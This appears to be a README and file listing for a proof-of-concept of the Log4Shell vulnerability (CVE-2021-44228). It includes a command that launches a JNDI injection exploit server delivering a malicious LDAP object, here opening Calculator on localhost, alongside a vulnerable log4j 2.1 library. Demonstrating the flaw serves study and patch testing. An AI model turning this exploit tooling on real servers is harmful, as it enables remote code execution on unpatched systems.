Proof of Concept of apache log4j LDAP lookup vulnerability. CVE-2021-44228# Apache-Log4j-POC CVE-2021-44228
Proof of Concept of apache log4j LDAP lookup vulnerability
You can read more about the vulnerability here:
https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
How to run the provided ldap server that returns malicious object ?
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"
# Courtesy: https://github.com/welk1n/JNDI-Injection-Exploit
[4.0K] /data/pocs/25f0c61d46ee71cf6b7dd8b516efef2632fcd203
├── [9.9M] JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
├── [ 360] log4j2.xml
├── [130K] log4j-api-2.1.jar
├── [805K] log4j-core-2.1.jar
├── [ 722] log4j.java
└── [ 459] README.md
0 directories, 6 files